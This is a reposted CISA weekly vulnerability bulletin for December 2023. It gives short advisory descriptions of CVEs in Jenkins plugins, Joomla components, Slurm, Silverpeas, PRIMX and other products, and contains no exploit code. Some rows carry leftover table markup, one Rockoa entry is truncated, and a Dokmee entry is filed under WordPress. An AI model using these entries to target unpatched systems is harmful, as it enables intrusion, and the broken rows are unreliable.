A vulnerability exists on all versions of Ivanti Connect Secure below 22.6R2 where an attacker with a foothold on an Ivanti Connect Secure (ICS) appliance can escalate their privileges by exploiting a vulnerable installed application. This vulnerability allows the attacker to gain elevated execution privileges on the affected system.
2023-12-14
not yet calculated
CVE-2023-41720
[email protected]
jenkins -- jenkins
Jenkins Scriptler Plugin 342.v6a_89fd40f466 and earlier does not restrict a file name query parameter in an HTTP endpoint, allowing attackers with Scriptler/Configure permission to delete arbitrary files on the Jenkins controller file system.
2023-12-13
not yet calculated
CVE-2023-50764
[email protected]
[email protected]
jenkins -- jenkins
A missing permission check in Jenkins Scriptler Plugin 342.v6a_89fd40f466 and earlier allows attackers with Overall/Read permission to read the contents of a Groovy script by knowing its ID.
2023-12-13
not yet calculated
CVE-2023-50765
[email protected]
[email protected]
jenkins -- jenkins
A cross-site request forgery (CSRF) vulnerability in Jenkins Nexus Platform Plugin 3.18.0-03 and earlier allows attackers to send an HTTP request to an attacker-specified URL and parse the response as XML.
2023-12-13
not yet calculated
CVE-2023-50766
[email protected]
[email protected]
jenkins -- jenkins
Missing permission checks in Jenkins Nexus Platform Plugin 3.18.0-03 and earlier allow attackers with Overall/Read permission to send an HTTP request to an attacker-specified URL and parse the response as XML.
2023-12-13
not yet calculated
CVE-2023-50767
[email protected]
[email protected]
jenkins -- jenkins
A cross-site request forgery (CSRF) vulnerability in Jenkins Nexus Platform Plugin 3.18.0-03 and earlier allows attackers to connect to an attacker-specified HTTP server using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.
2023-12-13
not yet calculated
CVE-2023-50768
[email protected]
[email protected]
jenkins -- jenkins
Missing permission checks in Jenkins Nexus Platform Plugin 3.18.0-03 and earlier allow attackers with Overall/Read permission to connect to an attacker-specified HTTP server using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.
2023-12-13
not yet calculated
CVE-2023-50769
[email protected]
[email protected]
jenkins -- jenkins
Jenkins OpenId Connect Authentication Plugin 2.6 and earlier stores a password of a local user account used as an anti-lockout feature in a recoverable format, allowing attackers with access to the Jenkins controller file system to recover the plain text password of that account, likely gaining administrator access to Jenkins.
2023-12-13
not yet calculated
CVE-2023-50770
[email protected]
[email protected]
jenkins -- jenkins
Jenkins OpenId Connect Authentication Plugin 2.6 and earlier improperly determines that a redirect URL after login is legitimately pointing to Jenkins, allowing attackers to perform phishing attacks.
2023-12-13
not yet calculated
CVE-2023-50771
[email protected]
[email protected]
jenkins -- jenkins
Jenkins Dingding JSON Pusher Plugin 2.0 and earlier stores access tokens unencrypted in job config.xml files on the Jenkins controller where they can be viewed by users with Item/Extended Read permission or access to the Jenkins controller file system.
2023-12-13
not yet calculated
CVE-2023-50772
[email protected]
[email protected]
jenkins -- jenkins
Jenkins Dingding JSON Pusher Plugin 2.0 and earlier does not mask access tokens displayed on the job configuration form, increasing the potential for attackers to observe and capture them.
2023-12-13
not yet calculated
CVE-2023-50773
[email protected]
[email protected]
jenkins -- jenkins
A cross-site request forgery (CSRF) vulnerability in Jenkins HTMLResource Plugin 1.02 and earlier allows attackers to delete arbitrary files on the Jenkins controller file system.
2023-12-13
not yet calculated
CVE-2023-50774
[email protected]
[email protected]
jenkins -- jenkins
A cross-site request forgery (CSRF) vulnerability in Jenkins Deployment Dashboard Plugin 1.0.10 and earlier allows attackers to copy jobs.
2023-12-13
not yet calculated
CVE-2023-50775
[email protected]
[email protected]
jenkins -- jenkins
Jenkins PaaSLane Estimate Plugin 1.0.4 and earlier stores PaaSLane authentication tokens unencrypted in job config.xml files on the Jenkins controller where they can be viewed by users with Item/Extended Read permission or access to the Jenkins controller file system.
2023-12-13
not yet calculated
CVE-2023-50776
[email protected]
[email protected]
jenkins -- jenkins
Jenkins PaaSLane Estimate Plugin 1.0.4 and earlier does not mask PaaSLane authentication tokens displayed on the job configuration form, increasing the potential for attackers to observe and capture them.
2023-12-13
not yet calculated
CVE-2023-50777
[email protected]
[email protected]
jenkins -- jenkins
A cross-site request forgery (CSRF) vulnerability in Jenkins PaaSLane Estimate Plugin 1.0.4 and earlier allows attackers to connect to an attacker-specified URL using an attacker-specified token.
2023-12-13
not yet calculated
CVE-2023-50778
[email protected]
[email protected]
jenkins -- jenkins
Missing permission checks in Jenkins PaaSLane Estimate Plugin 1.0.4 and earlier allow attackers with Overall/Read permission to connect to an attacker-specified URL using an attacker-specified token.
2023-12-13
not yet calculated
CVE-2023-50779
[email protected]
[email protected]
joomla -- joomla
A reflected XSS vulnerability was discovered in the LivingWord component for Joomla.
2023-12-14
not yet calculated
CVE-2023-40627
[email protected]
joomla -- joomla
A reflected XSS vulnerability was discovered in the Extplorer component for Joomla.
2023-12-14
not yet calculated
CVE-2023-40628
[email protected]
joomla -- joomla
SQLi vulnerability in LMS Lite component for Joomla.
2023-12-14
not yet calculated
CVE-2023-40629
[email protected]
joomla -- joomla
Unauthenticated LFI/SSRF in JCDashboards component for Joomla.
2023-12-14
not yet calculated
CVE-2023-40630
[email protected]
joomla -- joomla
A reflected XSS vulnerability was discovered in the Proforms Basic component for Joomla.
2023-12-14
not yet calculated
CVE-2023-40655
[email protected]
joomla -- joomla
A reflected XSS vulnerability was discovered in the Quickform component for Joomla.
2023-12-14
not yet calculated
CVE-2023-40656
[email protected]
joomla -- joomla
A reflected XSS vulnerability was discovered in the Joomdoc component for Joomla.
2023-12-14
not yet calculated
CVE-2023-40657
[email protected]
joomla -- joomla
A reflected XSS vulnerability was discovered in the Clicky Analytics Dashboard module for Joomla.
2023-12-14
not yet calculated
CVE-2023-40658
[email protected]
joomla -- joomla
A reflected XSS vulnerability was discovered in the Easy Quick Contact module for Joomla.
2023-12-14
not yet calculated
CVE-2023-40659
[email protected]
joomla -- joomla
SQLi vulnerability in S5 Register module for Joomla.
2023-12-14
not yet calculated
CVE-2023-49707
[email protected]
joomla -- joomla
SQLi vulnerability in Starshop component for Joomla.
2023-12-14
not yet calculated
CVE-2023-49708
[email protected]
kubeflow -- kubeflow/kubeflow
Server-Side Request Forgery (SSRF) in kubeflow/kubeflow
2023-12-14
not yet calculated
CVE-2023-6570
[email protected]
kubeflow -- kubeflow/kubeflow
Cross-site Scripting (XSS) - Reflected in kubeflow/kubeflow
2023-12-14
not yet calculated
CVE-2023-6571
[email protected]
lockss-daemon -- lockss-daemon
lockss-daemon (aka Classic LOCKSS Daemon) before 1.77.3 performs post-Unicode normalization, which may allow bypass of intended access restrictions, such as when U+1FEF is converted to a backtick.
2023-12-15
not yet calculated
CVE-2023-42183
[email protected]
majordomo -- majordomo
MajorDoMo (aka Major Domestic Module) before 0662e5e allows command execution via thumb.php shell metacharacters. NOTE: this is unrelated to the Majordomo mailing-list manager.
2023-12-15
not yet calculated
CVE-2023-50917
[email protected]
[email protected]
microweber -- microweber
Business Logic Errors in GitHub repository microweber/microweber prior to 2.0.
2023-12-15
not yet calculated
CVE-2023-6832
[email protected]
[email protected]
misp -- misp
app/Controller/AuditLogsController.php in MISP before 2.4.182 mishandles ACLs for audit logs.
2023-12-15
not yet calculated
CVE-2023-50918
[email protected]
[email protected]
mlflow -- mlflow
Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.
2023-12-15
not yet calculated
CVE-2023-6831
[email protected]
[email protected]
mozilla -- nss
The NSS code used for checking PKCS#1 v1.5 was leaking information useful in mounting Bleichenbacher-like attacks. Both the overall correctness of the padding as well as the length of the encrypted message was leaking through timing side-channel. By sending large number of attacker-selected ciphertexts, the attacker would be able to decrypt a previously intercepted PKCS#1 v1.5 ciphertext (for example, to decrypt a TLS session that used RSA key exchange), or forge a signature using the victim's key. The issue was fixed by implementing the implicit rejection algorithm, in which the NSS returns a deterministic random message in case invalid padding is detected, as proposed in the Marvin Attack paper. This vulnerability affects NSS < 3.61.
2023-12-12
not yet calculated
CVE-2023-4421
[email protected]
[email protected]
nagios -- nagios_xi
Nagios XI before version 5.11.3 was discovered to contain a SQL injection vulnerability via the bulk modification tool.
2023-12-14
not yet calculated
CVE-2023-48084
[email protected]
nagios -- nagios_xi
Nagios XI before version 5.11.3 was discovered to contain a remote code execution (RCE) vulnerability via the component command_test.php.
2023-12-14
not yet calculated
CVE-2023-48085
[email protected]
netgear -- wnr2000v4
A Command Injection vulnerability exists in NETGEAR WNR2000v4 version 1.0.0.70. When using HTTP for SOAP authentication, command execution occurs during the process after successful authentication.
2023-12-15
not yet calculated
CVE-2023-50089
[email protected]
[email protected]
opc_foundation -- opc_ua_.net_standard_reference_server
The OPC UA .NET Standard Reference Server before 1.4.371.86. places sensitive information into an error message that may be seen remotely.
2023-12-12
not yet calculated
CVE-2023-31048
[email protected]
[email protected]
[email protected]
parallels -- parallels_ras
The Remote Application Server in Parallels RAS before 19.2.23975 does not segment virtualized applications from the server, which allows a remote attacker to achieve remote code execution via standard kiosk breakout techniques.
2023-12-14
not yet calculated
CVE-2023-45894
[email protected]
phpmyfaq -- phpmyfaq
Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.17.
2023-12-16
not yet calculated
CVE-2023-6889
[email protected]
[email protected]
phpmyfaq -- phpmyfaq
Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.17.
2023-12-16
not yet calculated
CVE-2023-6890
[email protected]
[email protected]
pluck-cms -- pluck-cms
An arbitrary file upload vulnerability in the component /inc/modules_install.php of Pluck-CMS v4.7.18 allows attackers to execute arbitrary code via uploading a crafted ZIP file.
2023-12-14
not yet calculated
CVE-2023-50564
[email protected]
plutosvg -- plutosvg
PlutoSVG commit 336c02997277a1888e6ccbbbe674551a0582e5c4 and before was discovered to contain an integer overflow via the component plutosvg_load_from_memory.
2023-12-14
not yet calculated
CVE-2023-44709
[email protected]
[email protected]
popojicms -- popojicms
PopojiCMS version 2.0.1 is vulnerable to remote command execution in the Meta Social field.
2023-12-14
not yet calculated
CVE-2023-50011
[email protected]
prestashop -- sunnytoo_sturls
SQL njection vulnerability in SunnyToo sturls before version 1.1.13, allows attackers to escalate privileges and obtain sensitive information via StUrls::hookActionDispatcher and StUrls::getInstanceId methods.
2023-12-14
not yet calculated
CVE-2023-46348
[email protected]
primx_zed! -- zed_containers
ZED containers produced by PRIMX ZED! for Windows before Q.2020.3 (ANSSI qualification submission), ZED! for Windows before Q.2021.2 (ANSSI qualification submission), ZONECENTRAL for Windows before Q.2021.2 (ANSSI qualification submission), ZONECENTRAL for Windows before 2023.5, or ZEDMAIL for Windows before 2023.5 disclose the original path in which the containers were created, which allows an unauthenticated attacker to obtain some information regarding the context of use (project name, etc.).
2023-12-13
not yet calculated
CVE-2023-50439
[email protected]
[email protected]
primx_zed! -- zed_containers
ZED containers produced by PRIMX ZED! for Windows before Q.2020.3 (ANSSI qualification submission); ZED! for Windows before Q.2021.2 (ANSSI qualification submission); ZONECENTRAL for Windows before Q.2021.2 (ANSSI qualification submission); ZONECENTRAL for Windows before 2023.5; ZEDMAIL for Windows before 2023.5; ZED! for Windows, Mac, Linux before 2023.5; ZEDFREE for Windows, Mac, Linux before 2023.5; or ZEDPRO for Windows, Mac, Linux before 2023.5 can be modified by an unauthenticated attacker to include a UNC reference so that it could trigger network access to an attacker-controlled computer when opened by the victim.
2023-12-13
not yet calculated
CVE-2023-50440
[email protected]
[email protected]
primx_zonecentral -- encrypted_disks
Encrypted disks created by PRIMX CRYHOD for Windows before Q.2020.4 (ANSSI qualification submission) or CRYHOD for Windows before 2023.5 can be modified by an unauthenticated attacker to include a UNC reference so that it could trigger outbound network traffic from computers on which disks are opened.
2023-12-13
not yet calculated
CVE-2023-50443
[email protected]
[email protected]
primx_zonecentral -- encrypted_folders
Encrypted folders created by PRIMX ZONECENTRAL for Windows before Q.2021.2 (ANSSI qualification submission) or ZONECENTRAL for Windows before 2023.5 can be modified by an unauthenticated attacker to include a UNC reference so that it could trigger outbound network traffic from computers on which folders are opened.
2023-12-13
not yet calculated
CVE-2023-50441
[email protected]
[email protected]
primx_zonecentral -- encrypted_folders
Encrypted folders created by PRIMX ZONECENTRAL through 2023.5 can be modified by a local attacker (with appropriate privileges) so that specific file types are excluded from encryption temporarily. (This modification can, however, be detected, as described in the Administrator Guide.)
2023-12-13
not yet calculated
CVE-2023-50442
[email protected]
[email protected]
primx_zonecentral -- multiple_products
By default, .ZED containers produced by PRIMX ZED! for Windows before Q.2020.3 (ANSSI qualification submission); ZED! for Windows before Q.2021.2 (ANSSI qualification submission); ZONECENTRAL for Windows before Q.2021.2 (ANSSI qualification submission); ZONECENTRAL for Windows before 2023.5; ZEDMAIL for Windows before 2023.5; and ZED! for Windows, Mac, Linux before 2023.5 include an encrypted version of sensitive user information, which could allow an unauthenticated attacker to obtain it via brute force.
2023-12-13
not yet calculated
CVE-2023-50444
[email protected]
[email protected]
relyum -- multiple_products
An issue was discovered on Relyum RELY-PCIe 22.2.1 and RELY-REC 23.1.0 devices. There is a Weak SMB configuration with signing disabled.
2023-12-13
not yet calculated
CVE-2023-47574
[email protected]
relyum -- multiple_products
An issue was discovered on Relyum RELY-PCIe 22.2.1 and RELY-REC 23.1.0 devices. The web interfaces of the Relyum devices are susceptible to reflected XSS.
2023-12-13
not yet calculated
CVE-2023-47575
[email protected]
relyum -- multiple_products
An issue was discovered in Relyum RELY-PCIe 22.2.1 and RELY-REC 23.1.0 devices, allowing authenticated command injection through the web interface.
2023-12-13
not yet calculated
CVE-2023-47576
[email protected]
relyum -- multiple_products
An issue discovered in Relyum RELY-PCIe 22.2.1 and RELY-REC 23.1.0 allows for unauthorized password changes due to no check for current password.
2023-12-13
not yet calculated
CVE-2023-47577
[email protected]
relyum -- multiple_products
Relyum RELY-PCIe 22.2.1 and RELY-REC 23.1.0 devices are susceptible to Cross Site Request Forgery (CSRF) attacks due to the absence of CSRF protection in the web interface.
2023-12-13
not yet calculated
CVE-2023-47578
[email protected]
relyum -- rely-pcle
Relyum RELY-PCIe 22.2.1 devices suffer from a system group misconfiguration, allowing read access to the central password hash file of the operating system.
2023-12-13
not yet calculated
CVE-2023-47579
[email protected]
rockoa -- rockoa
Rockoa td> [TD]
2023-12-13

[TD]
not yet calculated
[/TD]
[TD]CVE-2023-49363
[email protected][/TD]

[/TD]

[TD]
[TR]
[TD]
rpcms -- rpcms
[/TD]
[TD]
A cross-site scripting (XSS) vulnerability in the component /logs/dopost.html in RPCMS v3.5.5 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.
[/TD]
[TD]
2023-12-14
[/TD]
[TD]
not yet calculated
[/TD]
[TD]CVE-2023-50565
[email protected][/TD]
[/TR]
[TR]
[TD]
schedmd -- slurm
[/TD]
[TD]
An issue was discovered in SchedMD Slurm 22.05.x, 23.02.x, and 23.11.x. There is Improper Enforcement of Message Integrity During Transmission in a Communication Channel. This allows attackers to modify RPC traffic in a way that bypasses message hash checks. The fixed versions are 22.05.11, 23.02.7, and 23.11.1.
[/TD]
[TD]
2023-12-14
[/TD]
[TD]
not yet calculated
[/TD]
[TD]CVE-2023-49933
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
schedmd -- slurm
[/TD]
[TD]
An issue was discovered in SchedMD Slurm 23.11.x. There is SQL Injection against the SlurmDBD database. The fixed version is 23.11.1.
[/TD]
[TD]
2023-12-14
[/TD]
[TD]
not yet calculated
[/TD]
[TD]CVE-2023-49934
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
schedmd -- slurm
[/TD]
[TD]
An issue was discovered in SchedMD Slurm 23.02.x and 23.11.x. There is Incorrect Access Control because of a slurmd Message Integrity Bypass. An attacker can reuse root-level authentication tokens during interaction with the slurmd process. This bypasses the RPC message hashes that protect against undesired MUNGE credential reuse. The fixed versions are 23.02.7 and 23.11.1.
[/TD]
[TD]
2023-12-14
[/TD]
[TD]
not yet calculated
[/TD]
[TD]CVE-2023-49935
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
schedmd -- slurm
[/TD]
[TD]
An issue was discovered in SchedMD Slurm 22.05.x, 23.02.x, and 23.11.x. A NULL pointer dereference leads to denial of service. The fixed versions are 22.05.11, 23.02.7, and 23.11.1.
[/TD]
[TD]
2023-12-14
[/TD]
[TD]
not yet calculated
[/TD]
[TD]CVE-2023-49936
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
schedmd -- slurm
[/TD]
[TD]
An issue was discovered in SchedMD Slurm 22.05.x, 23.02.x, and 23.11.x. Because of a double free, attackers can cause a denial of service or possibly execute arbitrary code. The fixed versions are 22.05.11, 23.02.7, and 23.11.1.
[/TD]
[TD]
2023-12-14
[/TD]
[TD]
not yet calculated
[/TD]
[TD]CVE-2023-49937
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
schedmd -- slurm
[/TD]
[TD]
An issue was discovered in SchedMD Slurm 22.05.x and 23.02.x. There is Incorrect Access Control: an attacker can modified their extended group list that is used with the sbcast subsystem, and open files with an unauthorized set of extended groups. The fixed versions are 22.05.11 and 23.02.7.
[/TD]
[TD]
2023-12-14
[/TD]
[TD]
not yet calculated
[/TD]
[TD]CVE-2023-49938
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
semcms -- semcms
[/TD]
[TD]
Semcms v4.8 was discovered to contain a SQL injection vulnerability via the AID parameter at SEMCMS_Function.php.
[/TD]
[TD]
2023-12-14
[/TD]
[TD]
not yet calculated
[/TD]
[TD]CVE-2023-50563
[email protected][/TD]
[/TR]
[TR]
[TD]
shenzhen_libituo_technology_co.,_ltd -- lbt-7300-t310
[/TD]
[TD]
Shenzhen Libituo Technology Co., Ltd LBT-T300-T310 v2.2.2.6 was discovered to contain a buffer overflow via the ApCliEncrypType parameter at /apply.cgi.
[/TD]
[TD]
2023-12-15
[/TD]
[TD]
not yet calculated
[/TD]
[TD]CVE-2023-50469
[email protected][/TD]
[/TR]
[TR]
[TD]
silverpeas -- core
[/TD]
[TD]
Silverpeas Core 6.3.1 is vulnerable to Cross Site Scripting (XSS) via the message/notification feature.
[/TD]
[TD]
2023-12-13
[/TD]
[TD]
not yet calculated
[/TD]
[TD]CVE-2023-47324
[email protected]
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
silverpeas -- core
[/TD]
[TD]
Silverpeas Core 6.3.1 administrative "Bin" feature is affected by broken access control. A user with low privileges is able to navigate directly to the bin, revealing all deleted spaces. The user can then restore or permanently delete the spaces.
[/TD]
[TD]
2023-12-13
[/TD]
[TD]
not yet calculated
[/TD]
[TD]CVE-2023-47325
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
silverpeas -- core
[/TD]
[TD]
Silverpeas Core 6.3.1 is vulnerable to Cross Site Request Forgery (CSRF) via the Domain SQL Create function.
[/TD]
[TD]
2023-12-13
[/TD]
[TD]
not yet calculated
[/TD]
[TD]CVE-2023-47326
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
silverpeas -- core
[/TD]
[TD]
The "Create a Space" feature in Silverpeas Core 6.3.1 is reserved for use by administrators. This function suffers from broken access control, allowing any authenticated user to create a space by navigating to the correct URL.
[/TD]
[TD]
2023-12-13
[/TD]
[TD]
not yet calculated
[/TD]
[TD]CVE-2023-47327
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
softing -- opc_ua_c++_sdk
[/TD]
[TD]
An uncaught exception issue discovered in Softing OPC UA C++ SDK before 6.30 for Windows operating system may cause the application to crash when the server wants to send an error packet, while socket is blocked on writing.
[/TD]
[TD]
2023-12-14
[/TD]
[TD]
not yet calculated
[/TD]
[TD]CVE-2023-41151
[email protected][/TD]
[/TR]
[TR]
[TD]
tinyxml -- tinyxml
[/TD]
[TD]
StringEqual in TiXmlDeclaration:arse in tinyxmlparser.cpp in TinyXML through 2.6.2 has a reachable assertion (and application exit) via a crafted XML document with a '\0' located after whitespace.
[/TD]
[TD]
2023-12-13
[/TD]
[TD]
not yet calculated
[/TD]
[TD]CVE-2023-34194
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
uffizio -- gps_tracker
[/TD]
[TD]
An improper access control vulnerability exists in Uffizio's GPS Tracker all versions that lead to sensitive information disclosure of all the connected devices. By visiting the vulnerable host at port 9000, we see it responds with a JSON body that has all the details about the devices which have been deployed.
[/TD]
[TD]
2023-12-16
[/TD]
[TD]
not yet calculated
[/TD]
[TD]CVE-2020-17483
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
uffizio -- gps_tracker
[/TD]
[TD]
An Open Redirection vulnerability exists in Uffizio's GPS Tracker all versions allows an attacker to construct a URL within the application that causes a redirection to an arbitrary external domain.
[/TD]
[TD]
2023-12-16
[/TD]
[TD]
not yet calculated
[/TD]
[TD]CVE-2020-17484
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
uffizio -- gps_tracker
[/TD]
[TD]
A Remote Code Execution vulnerability exist in Uffizio's GPS Tracker all versions. The web server can be compromised by uploading and executing a web/reverse shell. An attacker could then run commands, browse system files, and browse local resources
[/TD]
[TD]
2023-12-16
[/TD]
[TD]
not yet calculated
[/TD]
[TD]CVE-2020-17485
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
unrealircd -- unrealircd
[/TD]
[TD]
A buffer overflow in websockets in UnrealIRCd 6.1.0 through 6.1.3 before 6.1.4 allows an unauthenticated remote attacker to crash the server by sending an oversized packet (if a websocket port is open). Remote code execution might be possible on some uncommon, older platforms.
[/TD]
[TD]
2023-12-16
[/TD]
[TD]
not yet calculated
[/TD]
[TD]CVE-2023-50784
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
vmware -- workspace_one_launcher
[/TD]
[TD]
Workspace ONE Launcher contains a Privilege Escalation Vulnerability. A malicious actor with physical access to Workspace ONE Launcher could utilize the Edge Panel feature to bypass setup to gain access to sensitive information.
[/TD]
[TD]
2023-12-12
[/TD]
[TD]
not yet calculated
[/TD]
[TD]CVE-2023-34064
[email protected][/TD]
[/TR]
[TR]
[TD]
wordpress -- wordpress
[/TD]
[TD]
Dokmee ECM 7.4.6 allows remote code execution because the response to a GettingStarted/SaveSQLConnectionAsync /#/gettingstarted request contains a connection string for privileged SQL Server database access, and xp_cmdshell can be enabled.
[/TD]
[TD]
2023-12-14
[/TD]
[TD]
not yet calculated
[/TD]
[TD]CVE-2023-47261
[email protected]
[email protected][/TD]
[/TR]
[/TD]

[TD]

Back to top

[/TD]
[TD]

[/TD]

Continue reading...

Primary Vendor -- Product	Description	Published	CVSS Score	Source & Patch Info
adobe -- experience_manager	Adobe Experience Manager versions 6.5.18 and earlier are affected by an Improper Input Validation vulnerability. A low-privileged attacker could leverage this vulnerability to achieve a low-integrity impact within the application. Exploitation of this issue requires user interaction.	2023-12-15	3.5	CVE-2023-48608 [email protected]
apache -- server	A flaw was found in the mod_proxy_cluster in the Apache server. This issue may allow a malicious user to add a script in the 'alias' parameter in the URL to trigger the stored cross-site scripting (XSS) vulnerability. By adding a script on the alias parameter on the URL, it adds a new virtual host and adds the script to the cluster-manager page. The impact of this vulnerability is considered as Low, as the cluster_manager URL should not be exposed outside and is protected by user/password.	2023-12-12	3.5	CVE-2023-6710 [email protected] [email protected]
apple -- macos	This issue was addressed with improved state management. This issue is fixed in macOS Sonoma 14.2. Secure text fields may be displayed via the Accessibility Keyboard when using a physical keyboard.	2023-12-12	2.4	CVE-2023-42874 [email protected] [email protected]
codeastro -- pos_and_inventory_management_system	A vulnerability was found in CodeAstro POS and Inventory Management System 1.0. It has been classified as problematic. This affects an unknown part of the file /item/item_con. The manipulation of the argument item_name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-247911.	2023-12-13	3.5	CVE-2023-6775 [email protected] [email protected] [email protected]
fortinet -- multiple_products	An improper access control vulnerability [CWE-284] in FortiOS version 7.2.0, version 7.0.13 and below, version 6.4.14 and below and FortiProxy version 7.2.3 and below, version 7.0.9 and below, version 2.0.12 and below may allow a remote unauthenticated attacker to bypass the firewall deny geolocalisation policy via timing the bypass with a GeoIP database update.	2023-12-13	3.1	CVE-2023-47536 [email protected]
gitlab -- gitlab	An issue has been discovered in GitLab EE affecting all versions starting from 8.17 before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. It was possible for auditor users to fork and submit merge requests to private projects they're not a member of.	2023-12-15	2	CVE-2023-3511 [email protected] [email protected]
h2o -- h2o	h2o is an HTTP server with support for HTTP/1.x, HTTP/2 and HTTP/3. The QUIC stack (quicly), as used by H2O up to commit 43f86e5 (in version 2.3.0-beta and prior), is susceptible to a state exhaustion attack. When H2O is serving HTTP/3, a remote attacker can exploit this vulnerability to progressively increase the memory retained by the QUIC stack. This can eventually cause H2O to abort due to memory exhaustion. The vulnerability has been resolved in commit d67e81d03be12a9d53dc8271af6530f40164cd35. HTTP/1 and HTTP/2 are not affected by this vulnerability as they do not use QUIC. Administrators looking to mitigate this issue without upgrading can disable HTTP/3 support.	2023-12-12	3.7	CVE-2023-50247 [email protected] [email protected]
hcl_software -- hcl_connections	HCL Connections is vulnerable to an information disclosure vulnerability which could allow a user to obtain sensitive information they are not entitled to, caused by improper handling of request data.	2023-12-15	3.5	CVE-2023-28022 [email protected]
nautobot -- nautobot	Nautobot is a Network Source of Truth and Network Automation Platform built as a web application atop the Django Python framework with a PostgreSQL or MySQL database. In Nautobot 1.x and 2.0.x prior to 1.6.7 and 2.0.6, the URLs `/files/get/?name=...` and `/files/download/?name=...` are used to provide admin access to files that have been uploaded as part of a run request for a Job that has FileVar inputs. Under normal operation these files are ephemeral and are deleted once the Job in question runs. In the default implementation used in Nautobot, as provided by `django-db-file-storage`, these URLs do not by default require any user authentication to access; they should instead be restricted to only users who have permissions to view Nautobot's `FileProxy` model instances. Note that no URL mechanism is provided for listing or traversal of the available file `name` values, so in practice an unauthenticated user would have to guess names to discover arbitrary files for download, but if a user knows the file name/path value, they can access it without authenticating, so we are considering this a vulnerability. Fixes are included in Nautobot 1.6.7 and Nautobot 2.0.6. No known workarounds are available other than applying the patches included in those versions.	2023-12-12	3.7	CVE-2023-50263 [email protected] [email protected] [email protected] [email protected] [email protected] [email protected]
newsletter_software -- supermailer	Improper input validation vulnerability in Newsletter Software SuperMailer affecting version 11.20.0.2204. An attacker could exploit this vulnerability by sending a malicious configuration file (file with SMB extension) to a user via a link or email attachment and persuade the user to open the file with the affected software on the local system. A successful exploit could allow the attacker to crash the application when attempting to load the malicious file.	2023-12-13	3.3	CVE-2023-6381 [email protected]
palo_alto_networks -- pan-os	An improper privilege management vulnerability in Palo Alto Networks PAN-OS software enables an authenticated read-only administrator to revoke active XML API keys from the firewall and disrupt XML API usage.	2023-12-13	2.7	CVE-2023-6793 [email protected]
sap -- cloud_connector	SAP Cloud Connector - version 2.0, allows an authenticated user with low privilege to perform Denial of service attack from adjacent UI by sending a malicious request which leads to low impact on the availability and no impact on confidentiality or Integrity of the application.	2023-12-12	3.5	CVE-2023-49578 [email protected] [email protected]
siemens -- sinec_ins	A vulnerability has been identified in SINEC INS (All versions < V1.0 SP2 Update 2). The Web UI of affected devices does not check the length of parameters in certain conditions. This allows a malicious admin to crash the server by sending a crafted request to the server. The server will automatically restart.	2023-12-12	2.7	CVE-2023-48429 [email protected]
siemens -- sinec_ins	A vulnerability has been identified in SINEC INS (All versions < V1.0 SP2 Update 2). The REST API of affected devices does not check the length of parameters in certain conditions. This allows a malicious admin to crash the server by sending a crafted request to the API. The server will automatically restart.	2023-12-12	2.7	CVE-2023-48430 [email protected]
typecho -- typecho	A vulnerability classified as problematic was found in Typecho 1.2.1. Affected by this vulnerability is an unknown functionality of the file /admin/manage-pages.php of the component Page Handler. The manipulation leads to backdoor. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-247249 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.	2023-12-08	2.7	CVE-2023-6614 [email protected] [email protected] [email protected]
umbraco -- umbraco	Umbraco is an ASP.NET content management system (CMS). Starting in version 8.0.0 and prior to versions 8.18.10, 10.7.0, and 12.1.0, a user with access to a specific part of the backoffice is able to inject HTML code into a form where it is not intended. Versions 8.18.10, 10.7.0, and 12.1.0 contain a patch for this issue.	2023-12-12	3.5	CVE-2023-38694 [email protected]
wordpress -- wordpress	The Welcart e-Commerce plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 2.9.6 via the upload_certificate_file function. This makes it possible for administrators to upload .pem or .crt files to arbitrary locations on the server.	2023-12-09	2.7	CVE-2023-6120 [email protected] [email protected] [email protected]

CISA Bulletins - Vulnerability Summary for the Week of December 11, 2023

CISA

Guest

High Vulnerabilities​

Medium Vulnerabilities​

Low Vulnerabilities​

Severity Not Yet Assigned​

High Vulnerabilities

Medium Vulnerabilities

Low Vulnerabilities

Severity Not Yet Assigned